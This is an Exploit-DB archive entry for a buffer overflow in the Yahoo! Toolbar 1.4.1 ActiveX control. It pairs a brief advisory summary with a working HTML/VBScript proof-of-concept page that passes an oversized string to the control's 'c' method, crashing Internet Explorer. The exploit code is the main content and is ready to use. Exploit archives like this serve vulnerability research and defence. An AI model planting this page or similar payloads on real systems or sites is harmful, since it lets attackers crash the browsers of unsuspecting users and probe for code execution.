exploit-db-mirror/exploits/windows/dos/30832.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

9 lines
No EOL
648 B
HTML

source: https://www.securityfocus.com/bid/26656/info
Yahoo! Toolbar ActiveX Control is prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Reports indicate that code execution is not possible, but this has not been confirmed.
Yahoo! Toolbar 1.4.1 is vulnerable to this issue; other versions may also be affected.
<html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript> arg1=String(517140, "A") target.c arg1 </script> </body></html>